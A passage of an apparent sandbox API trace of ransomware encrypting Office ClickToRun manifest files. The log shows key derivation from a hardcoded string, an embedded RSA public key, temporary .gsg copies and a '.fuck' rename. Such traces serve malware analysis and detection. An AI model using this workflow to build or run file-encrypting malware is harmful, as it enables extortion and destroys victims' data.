pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28abfa8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.328] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28abfa8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.328] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.328] CryptEncrypt (in: hKey=0x2893b70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.328] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.328] CloseHandle (hObject=0xffffffff) returned 1 [0239.328] CloseHandle (hObject=0xffffffff) returned 1 [0239.328] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0239.328] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0239.329] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml.gsg")) returned 0 [0239.329] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml.fuck")) returned 0 [0239.330] CryptDestroyHash (hHash=0x2893af0) returned 1 [0239.330] CryptDestroyKey (hKey=0x2893b70) returned 1 [0239.330] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.330] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.330] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.330] GetLastError () returned 0x5 [0239.330] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlookmui.msi.16.en-us.xml")) returned 0x20 [0239.330] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0239.331] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlookmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.331] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlookmui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.332] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.332] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28abd88) returned 1 [0239.335] CryptCreateHash (in: hProv=0x28abd88, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.335] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.335] CryptHashData (hHash=0x2893fb0, pbData=0x2856f20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.335] CryptDeriveKey (in: hProv=0x28abd88, Algid=0x6610, hBaseData=0x2893fb0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893b70) returned 1 [0239.335] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.335] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.335] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ac030) returned 1 [0239.335] CryptImportPublicKeyInfo (in: hCryptProv=0x28ac030, dwCertEncodingType=0x1, pInfo=0x2897d30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2897d60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2897d68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2894230) returned 1 [0239.335] CryptEncrypt (in: hKey=0x2894230, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.336] CryptEncrypt (in: hKey=0x2894230, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28abae0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28abae0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.336] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28abae0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.336] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.336] CryptEncrypt (in: hKey=0x2893b70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.336] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.336] CloseHandle (hObject=0xffffffff) returned 1 [0239.336] CloseHandle (hObject=0xffffffff) returned 1 [0239.336] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlookmui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlookmui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0239.337] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0239.337] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlookmui.msi.16.en-us.xml.gsg")) returned 0 [0239.337] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlookmui.msi.16.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.outlookmui.msi.16.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlookmui.msi.16.en-us.xml.fuck")) returned 0 [0239.338] CryptDestroyHash (hHash=0x2893fb0) returned 1 [0239.338] CryptDestroyKey (hKey=0x2893b70) returned 1 [0239.338] CryptReleaseContext (hProv=0x28abd88, dwFlags=0x0) returned 1 [0239.338] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.338] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.338] GetLastError () returned 0x5 [0239.338] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml")) returned 0x20 [0239.339] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0239.340] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.340] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.340] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.341] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab150) returned 1 [0239.343] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.343] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.343] CryptHashData (hHash=0x2893b70, pbData=0x2857240, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.343] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x2893b70, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893fb0) returned 1 [0239.343] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.343] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.343] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28abb68) returned 1 [0239.344] CryptImportPublicKeyInfo (in: hCryptProv=0x28abb68, dwCertEncodingType=0x1, pInfo=0x28986f0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2898720*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2898728*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2894270) returned 1 [0239.344] CryptEncrypt (in: hKey=0x2894270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.344] CryptEncrypt (in: hKey=0x2894270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28abd88*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28abd88*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.344] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28abd88, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.344] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.344] CryptEncrypt (in: hKey=0x2893fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.344] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.344] CloseHandle (hObject=0xffffffff) returned 1 [0239.344] CloseHandle (hObject=0xffffffff) returned 1 [0239.344] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0239.345] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0239.345] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml.gsg")) returned 0 [0239.346] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPivot.PowerPivot.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpivot.powerpivot.x-none.msi.16.x-none.xml.fuck")) returned 0 [0239.346] CryptDestroyHash (hHash=0x2893b70) returned 1 [0239.346] CryptDestroyKey (hKey=0x2893fb0) returned 1 [0239.346] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.346] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.347] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.347] GetLastError () returned 0x5 [0239.347] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml")) returned 0x20 [0239.347] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0239.347] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.348] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.powerpoint.powerpoint.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.348] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.349] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab150) returned 1 [0239.351] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.351] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.351] CryptHashData (hHash=0x2893af0, pbData=0x28572e0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.351] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x2893af0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893fb0) returned 1 [0239.351] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.351] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.351] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ac3e8) returned 1 [0239.352] CryptImportPublicKeyInfo (in: hCryptProv=0x28ac3e8, dwCertEncodingType=0x1, pInfo=0x2898480*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28984b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28984b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x28943b0) returned 1 [0239.352] CryptEncrypt (in: hKey=0x28943b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.352] CryptEncrypt (in: hKey=0x28943b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ab508*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28ab508*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.352] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ab508, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.352] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.352] CryptEncrypt (in: hKey=0x2893fb0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.352] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.352] CloseHandle (hObject=0xffffffff) returned 1 [0239.352] CloseHandle (hObject=0xffffffff) returned 1 [0239.352] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.PowerPoint.PowerPoint.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all 